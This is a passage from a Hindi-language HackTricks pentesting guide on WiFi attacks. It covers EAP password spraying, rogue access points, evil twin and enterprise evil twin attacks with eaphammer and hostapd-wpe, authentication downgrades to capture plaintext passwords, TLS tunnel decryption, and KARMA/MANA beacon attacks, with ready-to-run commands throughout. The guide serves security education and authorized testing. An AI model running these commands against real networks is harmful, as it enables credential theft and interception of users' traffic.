User-Name और अन्य प्रमाणीकरण विशेषताएँ आउटगोइंग RADIUS संदेश में प्रतिस्थापित की जाती हैं, जो आने वाले RADIUS अनुरोध में पाए गए गुमनाम User-Name और TTLS EAP-Message विशेषताओं को विस्थापित करती हैं।

अधिक जानकारी के लिए देखें https://www.interlinknetworks.com/app_notes/eap-peap.htm

EAP-Bruteforce (password spray)

यदि क्लाइंट से username और password का उपयोग करने की अपेक्षा की जाती है (ध्यान दें कि इस मामले में EAP-TLS मान्य नहीं होगा), तो आप usernames (अगले भाग को देखें) और passwords की एक सूची प्राप्त करने का प्रयास कर सकते हैं और bruteforce का उपयोग करके एक्सेस करने का प्रयास कर सकते हैं air-hammer.

bash

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

आप इस हमले को eaphammer का उपयोग करके भी कर सकते हैं:

bash

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

Client attacks Theory

Network Selection and Roaming

802.11 प्रोटोकॉल यह परिभाषित करता है कि एक स्टेशन Extended Service Set (ESS) में कैसे शामिल होता है, लेकिन यह ESS या इसके भीतर एक access point (AP) चुनने के लिए मानदंड निर्दिष्ट नहीं करता है।
स्टेशन एक ही ESSID साझा करने वाले APs के बीच घूम सकते हैं, एक भवन या क्षेत्र में कनेक्टिविटी बनाए रखते हुए।
प्रोटोकॉल ESS के लिए स्टेशन प्रमाणीकरण की आवश्यकता करता है लेकिन स्टेशन के लिए AP प्रमाणीकरण अनिवार्य नहीं करता है।

Preferred Network Lists (PNLs)

स्टेशन अपने Preferred Network List (PNL) में हर वायरलेस नेटवर्क का ESSID संग्रहीत करते हैं, जिसमें नेटवर्क-विशिष्ट कॉन्फ़िगरेशन विवरण भी होते हैं।
PNL का उपयोग ज्ञात नेटवर्कों से स्वचालित रूप से कनेक्ट करने के लिए किया जाता है, जिससे उपयोगकर्ता के अनुभव में सुधार होता है और कनेक्शन प्रक्रिया को सरल बनाया जाता है।

Passive Scanning

APs समय-समय पर beacon फ्रेम प्रसारित करते हैं, अपनी उपस्थिति और विशेषताओं की घोषणा करते हैं, जिसमें AP का ESSID शामिल होता है जब तक कि प्रसारण बंद न किया गया हो।
पैसिव स्कैनिंग के दौरान, स्टेशन beacon फ्रेम के लिए सुनते हैं। यदि किसी beacon का ESSID स्टेशन के PNL में एक प्रविष्टि से मेल खाता है, तो स्टेशन स्वचालित रूप से उस AP से कनेक्ट हो सकता है।
एक डिवाइस के PNL का ज्ञान संभावित शोषण की अनुमति देता है, एक ज्ञात नेटवर्क के ESSID की नकल करके, डिवाइस को एक धोखाधड़ी AP से कनेक्ट करने के लिए धोखा देना।

Active Probing

सक्रिय प्रोबिंग में स्टेशन पास के APs और उनकी विशेषताओं का पता लगाने के लिए प्रोब अनुरोध भेजते हैं।
निर्देशित प्रोब अनुरोध एक विशिष्ट ESSID को लक्षित करते हैं, यह पता लगाने में मदद करते हैं कि क्या कोई विशेष नेटवर्क रेंज में है, भले ही यह एक छिपा हुआ नेटवर्क हो।
प्रसारण प्रोब अनुरोध में एक शून्य SSID फ़ील्ड होती है और इन्हें सभी नजदीकी APs को भेजा जाता है, जिससे स्टेशन बिना अपने PNL की सामग्री का खुलासा किए किसी भी पसंदीदा नेटवर्क की जांच कर सकता है।

Simple AP with redirection to Internet

जटिल हमलों को करने के तरीके को समझाने से पहले यह समझाया जाएगा कैसे केवल एक AP बनाएं और इसके ट्रैफ़िक को इंटरनेट से जुड़े इंटरफेस पर रीडायरेक्ट करें।

ifconfig -a का उपयोग करके जांचें कि AP बनाने के लिए wlan इंटरफेस और इंटरनेट से जुड़े इंटरफेस मौजूद हैं।

DHCP & DNS

bash

apt-get install dnsmasq #Manages DHCP and DNS

/etc/dnsmasq.conf फ़ाइल बनाएँ:

ini

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

फिर IP और routes सेट करें:

bash

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

और फिर शुरू करें dnsmasq:

bash

dnsmasq -C dnsmasq.conf -d

hostapd

bash

apt-get install hostapd

hostapd.conf फ़ाइल बनाएँ:

ini

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

निराशाजनक प्रक्रियाओं को रोकें, मॉनिटर मोड सेट करें, और hostapd शुरू करें:

bash

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

फॉरवर्डिंग और रीडायरेक्शन

bash

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Evil Twin

An evil twin attack exploits the way WiFi clients recognize networks, primarily relying on the network name (ESSID) without requiring the base station (access point) to authenticate itself to the client. Key points include:

Difficulty in Differentiation: उपकरणों को वैध और धोखाधड़ी एक्सेस पॉइंट के बीच अंतर करने में कठिनाई होती है जब वे समान ESSID और एन्क्रिप्शन प्रकार साझा करते हैं। वास्तविक दुनिया के नेटवर्क अक्सर कवरेज को निर्बाध रूप से बढ़ाने के लिए समान ESSID के साथ कई एक्सेस पॉइंट का उपयोग करते हैं।
Client Roaming and Connection Manipulation: 802.11 प्रोटोकॉल उपकरणों को एक ही ESS के भीतर एक्सेस पॉइंट के बीच घूमने की अनुमति देता है। हमलावर इसको एक उपकरण को उसके वर्तमान बेस स्टेशन से डिस्कनेक्ट करने और एक धोखाधड़ी वाले से कनेक्ट करने के लिए लुभाकर भुनाने का प्रयास कर सकते हैं। यह एक मजबूत सिग्नल प्रदान करके या वैध एक्सेस पॉइंट के साथ कनेक्शन को बाधित करने के तरीकों जैसे कि डिअथेंटिकेशन पैकेट या जैमिंग के माध्यम से किया जा सकता है।
Challenges in Execution: कई, अच्छी तरह से रखे गए एक्सेस पॉइंट के साथ वातावरण में एक ईविल ट्विन हमले को सफलतापूर्वक निष्पादित करना चुनौतीपूर्ण हो सकता है। एकल वैध एक्सेस पॉइंट को डिअथेंटिकेट करने से अक्सर उपकरण को एक अन्य वैध एक्सेस पॉइंट से कनेक्ट करने का परिणाम होता है जब तक कि हमलावर सभी निकटवर्ती एक्सेस पॉइंट को डिअथेंटिकेट नहीं कर सकता या धोखाधड़ी एक्सेस पॉइंट को रणनीतिक रूप से नहीं रख सकता।

You can create a very basic Open Evil Twin (no capabilities to route traffic to Internet) doing:

bash

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

आप eaphammer का उपयोग करके एक Evil Twin भी बना सकते हैं (ध्यान दें कि eaphammer के साथ evil twins बनाने के लिए इंटरफेस monitor मोड में नहीं होना चाहिए):

bash

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

या Airgeddon का उपयोग करते समय: Options: 5,6,7,8,9 (Evil Twin अटैक मेनू के अंदर)।

कृपया ध्यान दें कि डिफ़ॉल्ट रूप से यदि PNL में एक ESSID WPA सुरक्षित के रूप में सहेजा गया है, तो डिवाइस स्वचालित रूप से एक ओपन ईविल ट्विन से कनेक्ट नहीं होगा। आप असली AP को DoS करने की कोशिश कर सकते हैं और आशा कर सकते हैं कि उपयोगकर्ता मैन्युअल रूप से आपके ओपन ईविल ट्विन से कनेक्ट होगा, या आप असली AP को DoS कर सकते हैं और हैंडशेक कैप्चर करने के लिए WPA ईविल ट्विन का उपयोग कर सकते हैं (इस विधि का उपयोग करते समय आप पीएसके नहीं जानते हैं, इसलिए आप पीड़ित को अपने साथ कनेक्ट नहीं करवा सकते, लेकिन आप हैंडशेक कैप्चर कर सकते हैं और इसे क्रैक करने की कोशिश कर सकते हैं)।

कुछ OS और AV उपयोगकर्ता को चेतावनी देंगे कि ओपन नेटवर्क से कनेक्ट करना खतरनाक है...

WPA/WPA2 Evil Twin

आप WPA/2 का उपयोग करके एक Evil Twin बना सकते हैं और यदि डिवाइस उस SSID से WPA/2 के साथ कनेक्ट करने के लिए कॉन्फ़िगर किए गए हैं, तो वे कनेक्ट करने की कोशिश करेंगे। किसी भी स्थिति में, 4-way-handshake को पूरा करने के लिए आपको जानना होगा कि क्लाइंट कौन सा पासवर्ड उपयोग करने वाला है। यदि आप नहीं जानते हैं, तो कनेक्शन पूरा नहीं होगा।

bash

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Enterprise Evil Twin

इन हमलों को समझने के लिए, मैं पहले WPA Enterprise explanation पढ़ने की सिफारिश करूंगा।

Using hostapd-wpe

hostapd-wpe को काम करने के लिए एक configuration फ़ाइल की आवश्यकता होती है। इन कॉन्फ़िगरेशन के निर्माण को automate करने के लिए, आप https://github.com/WJDigby/apd_launchpad का उपयोग कर सकते हैं (//etc/hostapd-wpe/ के अंदर python फ़ाइल डाउनलोड करें)

bash

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

कॉन्फ़िगरेशन फ़ाइल में आप कई विभिन्न चीज़ें चुन सकते हैं जैसे ssid, चैनल, उपयोगकर्ता फ़ाइलें, cret/key, dh पैरामीटर, wpa संस्करण और auth...

EAP-TLS के साथ hostapd-wpe का उपयोग करके किसी भी प्रमाणपत्र को लॉगिन करने की अनुमति देना।

EAPHammer का उपयोग करना

bash

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

डिफ़ॉल्ट रूप से, EAPHammer इन प्रमाणीकरण विधियों का उद्देश्य रखता है (ध्यान दें कि GTC को पहले प्रयास के रूप में स्पष्ट पासवर्ड प्राप्त करने के लिए और फिर अधिक मजबूत प्रमाणीकरण विधियों के उपयोग के लिए):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

यह लंबे कनेक्शन समय से बचने के लिए डिफ़ॉल्ट पद्धति है। हालाँकि, आप सर्वर को प्रमाणीकरण विधियों को सबसे कमजोर से सबसे मजबूत तक निर्दिष्ट करने के लिए भी कह सकते हैं:

--negotiate weakest

या आप निम्नलिखित का भी उपयोग कर सकते हैं:

--negotiate gtc-downgrade का उपयोग करके अत्यधिक कुशल GTC डाउनग्रेड कार्यान्वयन (plaintext passwords) का उपयोग करें।
--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP का उपयोग करके मैन्युअल रूप से प्रस्तावित विधियों को निर्दिष्ट करें (हमले के लिए संगठन के समान क्रम में वही प्रमाणीकरण विधियाँ प्रदान करने से हमले का पता लगाना बहुत अधिक कठिन हो जाएगा)।
Find more info in the wiki

Airgeddon का उपयोग करना

Airgeddon पहले से उत्पन्न प्रमाणपत्रों का उपयोग करके WPA/WPA2-Enterprise नेटवर्क के लिए EAP प्रमाणीकरण प्रदान कर सकता है। नकली नेटवर्क कनेक्शन प्रोटोकॉल को EAP-MD5 में डाउनग्रेड करेगा ताकि यह उपयोगकर्ता और पासवर्ड का MD5 कैप्चर कर सके। बाद में, हमलावर पासवर्ड को क्रैक करने की कोशिश कर सकता है।
Airgeddon आपको निरंतर Evil Twin हमले (noisy) या केवल तब तक Evil Attack बनाने की संभावना प्रदान करता है जब तक कोई कनेक्ट न हो (smooth)।

Evil Twins हमलों में PEAP और EAP-TTLS TLS टनल का डिबगिंग

यह विधि PEAP कनेक्शन में परीक्षण की गई थी लेकिन चूंकि मैं एक मनमाने TLS टनल को डिक्रिप्ट कर रहा हूँ, यह EAP-TTLS के साथ भी काम करना चाहिए

hostapd-wpe की कॉन्फ़िगरेशन के अंदर dh_file वाली पंक्ति को टिप्पणी करें (से dh_file=/etc/hostapd-wpe/certs/dh से #dh_file=/etc/hostapd-wpe/certs/dh)
यह hostapd-wpe को RSA का उपयोग करके कुंजी का आदान-प्रदान करने के लिए मजबूर करेगा, ताकि आप बाद में सर्वर की निजी कुंजी जानकर ट्रैफ़िक को डिक्रिप्ट कर सकें।

अब सामान्य रूप से उस संशोधित कॉन्फ़िगरेशन के साथ hostapd-wpe का Evil Twin शुरू करें। इसके अलावा, Evil Twin हमले को करने वाले इंटरफेस में wireshark शुरू करें।

अब या बाद में (जब आपने पहले से कुछ प्रमाणीकरण इरादे कैप्चर कर लिए हैं) आप Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit... में wireshark में निजी RSA कुंजी जोड़ सकते हैं।

एक नया प्रविष्टि जोड़ें और इस मानों के साथ फॉर्म भरें: IP address = any -- Port = 0 -- Protocol = data -- Key File (अपनी कुंजी फ़ाइल चुनें, समस्याओं से बचने के लिए एक कुंजी फ़ाइल बिना पासवर्ड सुरक्षा के चुनें)।

और नए "Decrypted TLS" टैब पर नज़र डालें:

KARMA, MANA, Loud MANA और ज्ञात बीकन हमले

ESSID और MAC काली/सफेद सूचियाँ

मीडिया एक्सेस कंट्रोल फ़िल्टर सूचियों (MFACLs) के विभिन्न प्रकार और एक धोखाधड़ी एक्सेस पॉइंट (AP) के व्यवहार पर उनके संबंधित मोड और प्रभाव:

MAC-आधारित व्हाइटलिस्ट:

धोखाधड़ी AP केवल व्हाइटलिस्ट में निर्दिष्ट उपकरणों से प्रॉब अनुरोधों का उत्तर देगा, अन्य सभी के लिए अदृश्य रहेगा।

MAC-आधारित ब्लैकलिस्ट:

धोखाधड़ी AP ब्लैकलिस्ट में उपकरणों से प्रॉब अनुरोधों की अनदेखी करेगा, जिससे धोखाधड़ी AP उन विशेष उपकरणों के लिए अदृश्य हो जाएगा।

SSID-आधारित व्हाइटलिस्ट:

धोखाधड़ी AP केवल विशिष्ट ESSIDs के लिए प्रॉब अनुरोधों का उत्तर देगा, जिससे यह उन उपकरणों के लिए अदृश्य हो जाएगा जिनकी पसंदीदा नेटवर्क सूचियों (PNLs) में वे ESSIDs नहीं हैं।

SSID-आधारित ब्लैकलिस्ट:

धोखाधड़ी AP ब्लैकलिस्ट में विशिष्ट ESSIDs के लिए प्रॉब अनुरोधों का उत्तर नहीं देगा, जिससे यह उन उपकरणों के लिए अदृश्य हो जाएगा जो उन विशेष नेटवर्कों की तलाश कर रहे हैं।

bash

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

bash

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

यह विधि हमलावर को एक दुर्भावनापूर्ण एक्सेस पॉइंट (AP) बनाने की अनुमति देती है जो नेटवर्क से कनेक्ट करने के लिए प्रयास कर रहे उपकरणों से सभी प्रॉब अनुरोधों का उत्तर देती है। यह तकनीक उपकरणों को हमलावर के AP से कनेक्ट करने के लिए धोखा देती है जो उपकरणों द्वारा खोजे जा रहे नेटवर्क की नकल करती है। एक बार जब एक उपकरण इस धोखेबाज़ AP को कनेक्शन अनुरोध भेजता है, तो यह कनेक्शन पूरा करता है, जिससे उपकरण गलती से हमलावर के नेटवर्क से कनेक्ट हो जाता है।

MANA

फिर, उपकरणों ने अनचाहे नेटवर्क प्रतिक्रियाओं की अनदेखी करना शुरू कर दिया, जिससे मूल कर्मा हमले की प्रभावशीलता कम हो गई। हालाँकि, MANA हमले के रूप में जानी जाने वाली एक नई विधि को इयान डी विलियर्स और डोमिनिक व्हाइट द्वारा पेश किया गया। यह विधि धोखेबाज़ AP उपकरणों से प्रेफर्ड नेटवर्क सूचियों (PNL) को उनके प्रसारित प्रॉब अनुरोधों का उत्तर देकर कैप्चर करती है जिसमें पहले उपकरणों द्वारा अनुरोधित नेटवर्क नाम (SSIDs) होते हैं। यह जटिल हमला मूल कर्मा हमले के खिलाफ सुरक्षा को दरकिनार करता है, उपकरणों द्वारा ज्ञात नेटवर्क को याद रखने और प्राथमिकता देने के तरीके का लाभ उठाकर।

MANA हमला उपकरणों से निर्देशित और प्रसारित प्रॉब अनुरोधों की निगरानी करके काम करता है। निर्देशित अनुरोधों के लिए, यह उपकरण के MAC पते और अनुरोधित नेटवर्क नाम को रिकॉर्ड करता है, इस जानकारी को एक सूची में जोड़ता है। जब एक प्रसारित अनुरोध प्राप्त होता है, तो AP उपकरण की सूची में किसी भी नेटवर्क से मेल खाने वाली जानकारी के साथ उत्तर देता है, जिससे उपकरण को धोखेबाज़ AP से कनेक्ट करने के लिए आकर्षित किया जाता है।

bash

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

A Loud MANA attack एक उन्नत रणनीति है जब उपकरण निर्देशित प्रॉबिंग का उपयोग नहीं करते हैं या जब उनके प्रेफर्ड नेटवर्क लिस्ट (PNL) हमलावर के लिए अज्ञात होते हैं। यह इस सिद्धांत पर काम करता है कि एक ही क्षेत्र में उपकरणों के PNL में कुछ नेटवर्क नाम साझा करने की संभावना होती है। चयनात्मक रूप से प्रतिक्रिया देने के बजाय, यह हमला सभी अवलोकित उपकरणों के संयुक्त PNL में पाए गए प्रत्येक नेटवर्क नाम (ESSID) के लिए प्रॉब प्रतिक्रियाएँ प्रसारित करता है। यह व्यापक दृष्टिकोण एक उपकरण के लिए एक परिचित नेटवर्क को पहचानने और धोखाधड़ी वाले एक्सेस पॉइंट (AP) से कनेक्ट करने का प्रयास करने की संभावना को बढ़ाता है।

bash

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Known Beacon attack

जब Loud MANA attack पर्याप्त नहीं हो सकता, तब Known Beacon attack एक और दृष्टिकोण प्रस्तुत करता है। यह विधि कनेक्शन प्रक्रिया को ब्रूट-फोर्स करती है, एक AP का अनुकरण करके जो किसी भी नेटवर्क नाम का उत्तर देती है, संभावित ESSIDs की एक सूची के माध्यम से चक्रित होती है जो एक शब्द सूची से निकाली गई है। यह कई नेटवर्कों की उपस्थिति का अनुकरण करता है, उम्मीद करते हुए कि एक ESSID पीड़ित के PNL में मेल खा जाए, जो निर्मित AP से कनेक्शन प्रयास को प्रेरित करता है। इस हमले को --loud विकल्प के साथ मिलाकर उपकरणों को फंसाने के लिए अधिक आक्रामक प्रयास के लिए बढ़ाया जा सकता है।

Eaphammer ने इस हमले को एक MANA हमले के रूप में लागू किया जहाँ सूची के अंदर सभी ESSIDs चार्ज किए जाते हैं (आप इसे --loud के साथ मिलाकर Loud MANA + Known beacons attack भी बना सकते हैं):

bash

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Known Beacon Burst attack

Known Beacon Burst attack में एक फ़ाइल में सूचीबद्ध प्रत्येक ESSID के लिए बकाइन फ़्रेमों का तेज़ी से प्रसारण करना शामिल है। यह नकली नेटवर्क का एक घना वातावरण बनाता है, जिससे उपकरणों के धोखाधड़ी AP से कनेक्ट होने की संभावना बहुत बढ़ जाती है, विशेष रूप से जब इसे MANA हमले के साथ मिलाया जाता है। यह तकनीक गति और मात्रा का लाभ उठाकर उपकरणों के नेटवर्क चयन तंत्र को अभिभूत करती है।

bash

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Wi-Fi Direct

Wi-Fi Direct एक प्रोटोकॉल है जो उपकरणों को पारंपरिक वायरलेस एक्सेस पॉइंट की आवश्यकता के बिना सीधे एक-दूसरे से लिंक करने की अनुमति देता है। यह क्षमता विभिन्न इंटरनेट ऑफ थिंग्स (IoT) उपकरणों, जैसे प्रिंटर और टेलीविजन में एकीकृत है, जो सीधे उपकरण-से-उपकरण संचार को सुविधाजनक बनाती है। Wi-Fi Direct की एक महत्वपूर्ण विशेषता यह है कि एक उपकरण एक एक्सेस पॉइंट की भूमिका निभाता है, जिसे समूह मालिक कहा जाता है, जो कनेक्शन का प्रबंधन करता है।

Wi-Fi Direct कनेक्शनों के लिए सुरक्षा Wi-Fi Protected Setup (WPS) के माध्यम से स्थापित की जाती है, जो सुरक्षित पेयरिंग के लिए कई विधियों का समर्थन करती है, जिसमें शामिल हैं:

Push-Button Configuration (PBC)
PIN entry
Near-Field Communication (NFC)

ये विधियाँ, विशेष रूप से PIN entry, पारंपरिक Wi-Fi नेटवर्क में WPS के समान कमजोरियों के प्रति संवेदनशील हैं, जिससे ये समान हमले के लक्ष्यों बन जाते हैं।

EvilDirect Hijacking

EvilDirect Hijacking एक ऐसा हमला है जो विशेष रूप से Wi-Fi Direct के लिए है। यह Evil Twin हमले के सिद्धांत को दर्शाता है लेकिन Wi-Fi Direct कनेक्शनों को लक्षित करता है। इस परिदृश्य में, एक हमलावर एक वैध समूह मालिक का अनुकरण करता है जिसका उद्देश्य उपकरणों को एक दुर्भावनापूर्ण इकाई से कनेक्ट करने के लिए धोखा देना है। इस विधि को airbase-ng जैसे उपकरणों का उपयोग करके निष्पादित किया जा सकता है, जिसमें अनुकरण किए गए उपकरण के चैनल, ESSID और MAC पते को निर्दिष्ट किया जाता है:

References

TODO: Take a look to https://github.com/wifiphisher/wifiphisher (login con facebook e imitacionde WPA en captive portals)

tip

HackTricks का समर्थन करें

सदस्यता योजनाएँ देखें!
हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।